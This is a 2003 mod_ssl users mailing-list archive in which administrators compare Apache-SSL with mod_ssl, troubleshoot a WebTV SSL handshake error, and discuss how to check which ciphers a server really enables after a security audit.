Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIEzjCC
AmMwggHMAgECMA0GCSqGSIb3DQEBBAUAMIGBMQswCQYDVQQGEwJTSTERMA8GA1UECBMIU2xv
dmVuaWExEDAOBgNVBAcTB01hcmlib3IxHTAbBgNVBAMTFHN0dXBhci5ob21lbGludXgubmV0
MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFzdGVyQHN0dXBhci5ob21lbGludXgubmV0MB4XDTAy
MTIxMjExMzY0OVoXDTAzMTIxMjExMzY0OVowcjELMAkGA1UEBhMCU0kxETAPBgNVBAgTCFNs
b3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMRQwEgYDVQQDEwtTYXNhIFNUVVBBUjEoMCYGCSqG
SIb3DQEJARYZc2FzYUBzdHVwYXIuaG9tZWxpbnV4Lm5ldDCBnzANBgkqhkiG9w0BAQEFAAOB
jQAwgYkCgYEAuPDzDL2oxWDqfSyIGvjH7JQTcF+Dn6tM6O2D4IGrgQK2MfAJXcd+AaMlwyGq
P3sND4BNo5mgsz7XyTjddvfRaste6UIUDnsbNlUQI+GApPHAoeiBTt7rWbkSYsllVPn3nS1t
indhZIiKWSbDfTRAOxz9Vk1dwmj9L7LoB8WcZ7MCAwEAATANBgkqhkiG9w0BAQQFAAOBgQBz
4fyueMI3+ORCD61BQid7JvCdCVpj7MF4lf4zh+WQpP7klV3/+8OMkLA3TK8EvDoLNeFKgbZZ
STSV6cUGuscfESGn9Kq0M9OMyNFFc/IR2qGgsohEZLa5EScodGUfOJzPlg1KNqXXaV3Aomyq
3WhJ07a2c9kwXpy/flFLlUmccDCCAmMwggHMAgECMA0GCSqGSIb3DQEBBAUAMIGBMQswCQYD
VQQGEwJTSTERMA8GA1UECBMIU2xvdmVuaWExEDAOBgNVBAcTB01hcmlib3IxHTAbBgNVBAMT
FHN0dXBhci5ob21lbGludXgubmV0MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFzdGVyQHN0dXBh
ci5ob21lbGludXgubmV0MB4XDTAyMTIxMjExMzY0OVoXDTAzMTIxMjExMzY0OVowcjELMAkG
A1UEBhMCU0kxETAPBgNVBAgTCFNsb3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMRQwEgYDVQQD
EwtTYXNhIFNUVVBBUjEoMCYGCSqGSIb3DQEJARYZc2FzYUBzdHVwYXIuaG9tZWxpbnV4Lm5l
dDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAuPDzDL2oxWDqfSyIGvjH7JQTcF+Dn6tM
6O2D4IGrgQK2MfAJXcd+AaMlwyGqP3sND4BNo5mgsz7XyTjddvfRaste6UIUDnsbNlUQI+GA
pPHAoeiBTt7rWbkSYsllVPn3nS1tindhZIiKWSbDfTRAOxz9Vk1dwmj9L7LoB8WcZ7MCAwEA
ATANBgkqhkiG9w0BAQQFAAOBgQBz4fyueMI3+ORCD61BQid7JvCdCVpj7MF4lf4zh+WQpP7k
lV3/+8OMkLA3TK8EvDoLNeFKgbZZSTSV6cUGuscfESGn9Kq0M9OMyNFFc/IR2qGgsohEZLa5
EScodGUfOJzPlg1KNqXXaV3Aomyq3WhJ07a2c9kwXpy/flFLlUmccDGCAoAwggJ8AgEBMIGH
MIGBMQswCQYDVQQGEwJTSTERMA8GA1UECBMIU2xvdmVuaWExEDAOBgNVBAcTB01hcmlib3Ix
HTAbBgNVBAMTFHN0dXBhci5ob21lbGludXgubmV0MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFz
dGVyQHN0dXBhci5ob21lbGludXgubmV0AgECMAkGBSsOAwIaBQCgggFOMBgGCSqGSIb3DQEJ
AzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAzMDEyMTE2MjgyMlowIwYJKoZIhvcN
AQkEMRYEFCh4PDr+W48ODLzaSjUlXPyOsXYWMFIGCSqGSIb3DQEJDzFFMEMwCgYIKoZIhvcN
AwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMC
AgEoMIGaBgsqhkiG9w0BCRACCzGBiqCBhzCBgTELMAkGA1UEBhMCU0kxETAPBgNVBAgTCFNs
b3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMR0wGwYDVQQDExRzdHVwYXIuaG9tZWxpbnV4Lm5l
dDEuMCwGCSqGSIb3DQEJARYfcG9zdG1hc3RlckBzdHVwYXIuaG9tZWxpbnV4Lm5ldAIBAjAN
BgkqhkiG9w0BAQEFAASBgB+SLKrV7bBUoA+Bjl+DHBZpqEz1YnmC1f/CrWyIrZ9I0ZAk9t7n
ELDv44FeOtCdCoPM5l4Oks3PtCVM81W4wKjWrIdTfYR5/0pTkM3H8DO1UmkX0ly55+B8F7Cs
tcYgCBD+SuVNCI3+B/Vip1ijLi0dvypzEnIP5Kk5p0APPRPfAAAAAAAA
--------------ms000701020108080402040803--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 22 20:12:04 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A0D292AA0A6; Wed, 22 Jan 2003 20:12:04 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mallard.mail.pas.earthlink.net (mallard.mail.pas.earthlink.net [207.217.120.48])
	by master.modssl.org (Postfix) with ESMTP id D0D312AA09A
	for ; Wed, 22 Jan 2003 20:11:58 +0100 (CET)
Received: from huey.psp.pas.earthlink.net ([207.217.78.220])
	by mallard.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 18bQHw-0000GP-00
	for modssl-users@modssl.org; Wed, 22 Jan 2003 11:11:52 -0800
Received: from [134.9.11.140] by EarthlinkWAM via HTTP; Wed Jan 22 11:11:52 PST 2003
Message-ID: <384836.1043262712164.JavaMail.nobody@huey.psp.pas.earthlink.net>
Date: Wed, 22 Jan 2003 11:11:50 -0800 (PST)
From: rmck 
To: modssl-users@modssl.org
Subject: Apache-SSL vs mod_ssl
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Earthlink Web Access Mail version 3.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rmck 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Whats the benefit of mod_ssl compared to Apache-SSL???

Thanks
Rob
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 22 20:20:56 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4EA322AA0A3; Wed, 22 Jan 2003 20:20:56 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id 9A4CC2AA08F
	for ; Wed, 22 Jan 2003 20:20:54 +0100 (CET)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 923542F50C; Wed, 22 Jan 2003 11:08:54 -0800 (PST)
Date: Wed, 22 Jan 2003 11:08:54 -0800
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Apache-SSL vs mod_ssl
Message-ID: <20030122190854.GA23660@rawbyte.com>
References: <384836.1043262712164.JavaMail.nobody@huey.psp.pas.earthlink.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <384836.1043262712164.JavaMail.nobody@huey.psp.pas.earthlink.net>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


> Whats the benefit of mod_ssl compared to Apache-SSL???

mod_ssl is derived originally from Apache SSL
mod_ssl is more widely used than Apache SSL
Apache SSL supports Apache 1.x
mod_ssl supports Apache 1.x and 2.x

Cheers

Daniel

--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 22 20:25:11 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6497F2AA0A3; Wed, 22 Jan 2003 20:25:11 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from deepthought.cs.virginia.edu (deepthought.cs.Virginia.EDU [128.143.69.223])
	by master.modssl.org (Postfix) with ESMTP id 9FF6A2AA08F
	for ; Wed, 22 Jan 2003 20:25:09 +0100 (CET)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id h0MJO1XN006368
	for ; Wed, 22 Jan 2003 14:24:01 -0500
Date: Wed, 22 Jan 2003 14:24:01 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache-SSL vs mod_ssl
In-Reply-To: <384836.1043262712164.JavaMail.nobody@huey.psp.pas.earthlink.net>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 22 Jan 2003, rmck wrote:

> Whats the benefit of mod_ssl compared to Apache-SSL???

Bells and whistles that you may or may not need.  Suggest you look over
the list of supported configuration directives for each to see which one
better fits your site.

Note that Apache 2.0 includes mod_ssl as part of the standard
distribution.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 23 09:26:15 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 494372AA099; Thu, 23 Jan 2003 09:26:15 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id BCD402AA081
	for ; Thu, 23 Jan 2003 09:26:13 +0100 (CET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id h0N8Q9lA019048
	for ; Thu, 23 Jan 2003 09:26:10 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h0N8Q8mM023194
	for ; Thu, 23 Jan 2003 09:26:09 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Apache-SSL vs mod_ssl
Date: Thu, 23 Jan 2003 09:26:08 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache-SSL vs mod_ssl
Importance: normal
thread-index: AcLCSkzfgX3GuXIDROaJqHvDJEjm2wAbS8Ow
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: rmck [mailto:rmckeever@earthlink.net]
>
>Whats the benefit of mod_ssl compared to Apache-SSL???
>

One has got "mod" in its name and the other hasn't :-)

I am not expert enough to comment on the two implementations of SSL
technology so I restrict myself to the useability differences:

Apache-SSL is a monolithic program with the SSL functionality hard-coded
into apache. This leads to a large binary. Also, many SSL directives are
*required* in the config in order for it to work. 

mod_ssl allows you to add or remove SSL functionality to an already
working apache (assuming you compiled with EAPI and DSO). So you have
more flexibility.

In a single server set-up, there is probably little to choose from
between the two, however, I could imagine a multi-apache environment
where you wanted some servers with SSL and some without. mod_ssl would
be a good choice there.

As far as I can see, there is no difference between Apache-SSL and
apache with mod_ssl statically compiled - both lead to a monolithic,
SSL-aware binary.

Finally, in my experience, mod_ssl tracks apache updates really fast.
Usually a new mod_ssl is ready within a day of a new apache version.
Apache-SSL tends to be slower and is sometimes a few versions behind

Rgds,

Owen Boyle

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 23 20:36:40 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 786612AA0AB; Thu, 23 Jan 2003 20:36:40 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mercury.pricegrabber.com (mercury.pricegrabber.com [65.241.50.130])
	by master.modssl.org (Postfix) with ESMTP id BF7A72AA081
	for ; Thu, 23 Jan 2003 20:36:38 +0100 (CET)
Received: from office15.internal.pricegrabber.com (office15.internal.pricegrabber.com [192.168.10.15])
	(authenticated bits=0)
	by mercury.pricegrabber.com (8.12.6/8.12.6) with ESMTP id h0NJaYLi003325
	for ; Thu, 23 Jan 2003 11:36:34 -0800
Subject: problems with WebTV
From: Christopher McCrory 
To: modssl-users@modssl.org
Content-Type: text/plain
Organization: 
Message-Id: <1043350593.15763.17.camel@morticia>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.1 (1.2.1-4) 
Date: 23 Jan 2003 11:36:33 -0800
Content-Transfer-Encoding: 7bit
X-RAVMilter-Version: 8.3.3(snapshot 20020312) (mercury.pricegrabber.com)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher McCrory 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello...

	We are having SSL problems with WebTV clients.  Static pages seem to
work, but POSTs seem to break with the following SSL error:

[Thu Jan 23 11:18:01 2003] [error] mod_ssl: SSL handshake failed: HTTP
spoken on HTTPS port; trying to send HTML error page (OpenSSL library
error follows)

[Thu Jan 23 11:18:01 2003] [error] OpenSSL:
error:1407609C:lib(20):func(118):reason(156)

What voodoo do I need to adjust for this 0.01% of the market browser? ;)

Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux) mod_gzip/1.3.26.1a
PHP/4.3.0 mod_ssl/2.8.12 OpenSSL/0.9.6b


-- 
Christopher McCrory
 "The guy that keeps the servers running"
 
chrismcc@pricegrabber.com
 http://www.pricegrabber.com
 
Let's face it, there's no Hollow Earth, no robots, and
no 'mute rays.' And even if there were, waxed paper is
no defense.  I tried it.  Only tinfoil works.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 03:05:35 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3AA262AA0A5; Fri, 24 Jan 2003 03:05:35 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from cathedral.teiresias.net (k215.denver.dsl.forethought.net [216.241.42.215])
	by master.modssl.org (Postfix) with ESMTP id C95932AA09F
	for ; Fri, 24 Jan 2003 03:05:31 +0100 (CET)
Received: from winter.teiresias.net (IDENT:i72lF/ZEtsNGIfJfiCqwcIdhiJ9IMutV@winter [192.168.10.15])
	by cathedral.teiresias.net (8.9.3/8.9.3) with ESMTP id TAA13788
	for ; Thu, 23 Jan 2003 19:08:48 -0700
Received: (from tyr@localhost)
	by winter.teiresias.net (8.11.6/8.9.3) id h0O2AQr01635
	for modssl-users@modssl.org; Thu, 23 Jan 2003 19:10:26 -0700
Date: Thu, 23 Jan 2003 19:10:26 -0700
From: Steve Chadsey 
To: modssl-users@modssl.org
Subject: Verifying enabled ciphers?
Message-ID: <20030123191026.I16282@winter.teiresias.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Chadsey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

How can I verify the ciphers enabled by my webserver?

The reason I ask is because I have been informed by a third-party
security auditor that my server "allows anonymous authentication",
"allows cleartext communication", and "supports weak encryption".
I am unable to verify any of these claims on my own.

Here is my information
Apache: 1.3.27
mod_ssl: mod_ssl/2.8.12-1.3.27
openssl: openssl-0.9.6g
OS: Solaris 8

Here are my relevant SSL directives from httpd.conf:
SSLEngine on
SSLCipherSuite HIGH:MEDIUM:!ADH
SSLProtocol all -SSLv2

According to 
  /usr/local/ssl/bin/openssl ciphers -v 'HIGH:MEDIUM:!ADH'
the supported ciphers for my server are:
EDH-RSA-DES-CBC3-SHA    SSLv3 Kx=DH       Au=RSA  Enc=3DES(168) Mac=SHA1
EDH-DSS-DES-CBC3-SHA    SSLv3 Kx=DH       Au=DSS  Enc=3DES(168) Mac=SHA1
DES-CBC3-SHA            SSLv3 Kx=RSA      Au=RSA  Enc=3DES(168) Mac=SHA1
DES-CBC3-MD5            SSLv2 Kx=RSA      Au=RSA  Enc=3DES(168) Mac=MD5
DHE-DSS-RC4-SHA         SSLv3 Kx=DH       Au=DSS  Enc=RC4(128)  Mac=SHA1
IDEA-CBC-SHA            SSLv3 Kx=RSA      Au=RSA  Enc=IDEA(128) Mac=SHA1
RC4-SHA                 SSLv3 Kx=RSA      Au=RSA  Enc=RC4(128)  Mac=SHA1
RC4-MD5                 SSLv3 Kx=RSA      Au=RSA  Enc=RC4(128)  Mac=MD5
IDEA-CBC-MD5            SSLv2 Kx=RSA      Au=RSA  Enc=IDEA(128) Mac=MD5
RC2-CBC-MD5             SSLv2 Kx=RSA      Au=RSA  Enc=RC2(128)  Mac=MD5
RC4-MD5                 SSLv2 Kx=RSA      Au=RSA  Enc=RC4(128)  Mac=MD5

But apparently I am also supporting:
ADH-DES-CBC-SHA
DES-CBC-SHA
EDH-DSS-DES-CBC-SHA
EDH-RSA-DES-CBC-SHA
EXP1024-DES-CBC-SHA
EXP1024-DHE-DSS-DES-CBC-SHA
EXP1024-DHE-DSS-RC4-SHA
EXP1024-RC2-CBC-MD5
EXP1024-RC4-MD5
EXP1024-RC4-SHA
EXP-ADH-DES-CBC-SHA
EXP-ADH-RC4-MD5
EXP-DES-CBC-SHA
EXP-EDH-DSS-DES-CBC-SHA
EXP-EDH-RSA-DES-CBC-SHA
EXP-RC2-CBC-MD5
EXP-RC4-MD5
NULL-MD5
NULL-SHA

Is the security auditor full of it?  How can I verify their results
from an external machine (they've scanned the network from an
external box)?

Thanks,
-- 
Steve Chadsey 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 08:54:30 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E26B22AA0A5; Fri, 24 Jan 2003 08:54:29 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from serv01.aet.tu-cottbus.de (serv01.aet.TU-Cottbus.De [141.43.132.161])
	by master.modssl.org (Postfix) with ESMTP id 150112AA08F
	for ; Fri, 24 Jan 2003 08:54:24 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 3436D31F1
	for ; Fri, 24 Jan 2003 08:54:20 +0100 (MET)
Received: from serv01.aet.tu-cottbus.de ([127.0.0.1])
 by localhost (serv01 [127.0.0.1:10024]) (amavisd-new) with LMTP id 29247-01-2
 for ; Fri, 24 Jan 2003 08:54:18 +0100 (MET)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 71A9031F0; Fri, 24 Jan 2003 08:54:18 +0100 (MET)
Date: Fri, 24 Jan 2003 08:54:18 +0100
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: Verifying enabled ciphers?
Message-ID: <20030124075417.GA29222@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <20030123191026.I16282@winter.teiresias.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030123191026.I16282@winter.teiresias.net>
Organization: BTU Cottbus, Allgemeine Elektrotechnik
User-Agent: Mutt/1.5.3i
X-Virus-Scanned: by amavisd-new
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Jan 23, 2003 at 07:10:26PM -0700, Steve Chadsey wrote:
> How can I verify the ciphers enabled by my webserver?
> 
> The reason I ask is because I have been informed by a third-party
> security auditor that my server "allows anonymous authentication",
> "allows cleartext communication", and "supports weak encryption".
> I am unable to verify any of these claims on my own.
> 
> Here is my information
> Apache: 1.3.27
> mod_ssl: mod_ssl/2.8.12-1.3.27
> openssl: openssl-0.9.6g
> OS: Solaris 8
> 
> Here are my relevant SSL directives from httpd.conf:
> SSLEngine on
> SSLCipherSuite HIGH:MEDIUM:!ADH
> SSLProtocol all -SSLv2
> 
> According to 
>   /usr/local/ssl/bin/openssl ciphers -v 'HIGH:MEDIUM:!ADH'
> the supported ciphers for my server are:
> EDH-RSA-DES-CBC3-SHA    SSLv3 Kx=DH       Au=RSA  Enc=3DES(168) Mac=SHA1
> EDH-DSS-DES-CBC3-SHA    SSLv3 Kx=DH       Au=DSS  Enc=3DES(168) Mac=SHA1
> DES-CBC3-SHA            SSLv3 Kx=RSA      Au=RSA  Enc=3DES(168) Mac=SHA1
> DES-CBC3-MD5            SSLv2 Kx=RSA      Au=RSA  Enc=3DES(168) Mac=MD5
> DHE-DSS-RC4-SHA         SSLv3 Kx=DH       Au=DSS  Enc=RC4(128)  Mac=SHA1
> IDEA-CBC-SHA            SSLv3 Kx=RSA      Au=RSA  Enc=IDEA(128) Mac=SHA1
> RC4-SHA                 SSLv3 Kx=RSA      Au=RSA  Enc=RC4(128)  Mac=SHA1
> RC4-MD5                 SSLv3 Kx=RSA      Au=RSA  Enc=RC4(128)  Mac=MD5
> IDEA-CBC-MD5            SSLv2 Kx=RSA      Au=RSA  Enc=IDEA(128) Mac=MD5
> RC2-CBC-MD5             SSLv2 Kx=RSA      Au=RSA  Enc=RC2(128)  Mac=MD5
> RC4-MD5                 SSLv2 Kx=RSA      Au=RSA  Enc=RC4(128)  Mac=MD5
> 
> But apparently I am also supporting:
> ADH-DES-CBC-SHA
> DES-CBC-SHA
> EDH-DSS-DES-CBC-SHA
> EDH-RSA-DES-CBC-SHA
> EXP1024-DES-CBC-SHA
> EXP1024-DHE-DSS-DES-CBC-SHA
> EXP1024-DHE-DSS-RC4-SHA
> EXP1024-RC2-CBC-MD5
> EXP1024-RC4-MD5
> EXP1024-RC4-SHA
> EXP-ADH-DES-CBC-SHA
> EXP-ADH-RC4-MD5
> EXP-DES-CBC-SHA
> EXP-EDH-DSS-DES-CBC-SHA
> EXP-EDH-RSA-DES-CBC-SHA
> EXP-RC2-CBC-MD5
> EXP-RC4-MD5
> NULL-MD5
> NULL-SHA
> 
> Is the security auditor full of it?  How can I verify their results
> from an external machine (they've scanned the network from an
> external box)?

Try to connect using
  openssl s_client -connect hostname:443 -cipher ADH-DES-CBC-SHA
to see, if it really succeeds. With respect to your seetings it
better should not.
Unfortunately the server-info handler does not list the enabled ciphers
for crosschecking. The SSLv3/TLSv1 specification says that the client
has to list its supported ciphers, so from the protocol side of view
the only option indeed is to test connections with the ciphers in
question.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 10:31:17 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BBADF2AA0A5; Fri, 24 Jan 2003 10:31:17 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 94AB72AA08F
	for ; Fri, 24 Jan 2003 10:31:11 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h0O9Z6604026
	for ; Fri, 24 Jan 2003 09:35:30 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 24 Jan 2003 09:30:29 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F25A9@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Verifying enabled ciphers?
Date: Fri, 24 Jan 2003 09:30:28 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Try http://www.netcraft.com/sslwhats. It will give you a list of ciphers.

To unpack the terms:
 
"allows anonymous authentication" - That sounds like allowing anyone to
visit your site, since I've never heard of anonymous auth for http, only
ftp. Of course, the evil IIS uses a specific account for "anonymous" access
(supposedly to protect your filesystem, but it's pants), which might be what
they are thinking of. 

"allows cleartext communication" - That's what you get on non-secured sites.
If the data doesn't need to be secured, there's no issue.

"supports weak encryption" - Allows older browsers that have
"export-crippled" security to connect. On the above Netcraft site, you'll
see "export version". The question for you is whether it is satisfactory to
exclude older browsers from your websites. We've decided it isn't, so we
stick with the export ciphers. It's true that they could be compromised in
some way, but if there are users out there who are using ancient browsers
then they probably have no up to date anti-virus protection either, so this
is the least of their worries.

You'll need more information about all of these one from your auditor,
rather than just sweeping statements.

We had a security auditor recently who said much the same.


- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Nearly everything we believe is second hand. For example, less than 500
people have seen the Earth from space, yet the majority of people believe it
is round (or an oblate sphere for the pedants).

> -----Original Message-----
> From: Steve Chadsey [mailto:tyr@teiresias.net]
> Sent: 24 January 2003 02:10
> To: modssl-users@modssl.org
> Subject: Verifying enabled ciphers?
> 
> 
> How can I verify the ciphers enabled by my webserver?
> 
> The reason I ask is because I have been informed by a third-party
> security auditor that my server "allows anonymous authentication",
> "allows cleartext communication", and "supports weak encryption".
> I am unable to verify any of these claims on my own.
> 
> Here is my information
> Apache: 1.3.27
> mod_ssl: mod_ssl/2.8.12-1.3.27
> openssl: openssl-0.9.6g
> OS: Solaris 8
> 
> Here are my relevant SSL directives from httpd.conf:
> SSLEngine on
> SSLCipherSuite HIGH:MEDIUM:!ADH
> SSLProtocol all -SSLv2
> 
> According to 
>   /usr/local/ssl/bin/openssl ciphers -v 'HIGH:MEDIUM:!ADH'
> the supported ciphers for my server are:
> EDH-RSA-DES-CBC3-SHA    SSLv3 Kx=DH       Au=RSA  
> Enc=3DES(168) Mac=SHA1
> EDH-DSS-DES-CBC3-SHA    SSLv3 Kx=DH       Au=DSS  
> Enc=3DES(168) Mac=SHA1
> DES-CBC3-SHA            SSLv3 Kx=RSA      Au=RSA  
> Enc=3DES(168) Mac=SHA1
> DES-CBC3-MD5            SSLv2 Kx=RSA      Au=RSA  
> Enc=3DES(168) Mac=MD5
> DHE-DSS-RC4-SHA         SSLv3 Kx=DH       Au=DSS  
> Enc=RC4(128)  Mac=SHA1
> IDEA-CBC-SHA            SSLv3 Kx=RSA      Au=RSA  
> Enc=IDEA(128) Mac=SHA1
> RC4-SHA                 SSLv3 Kx=RSA      Au=RSA  
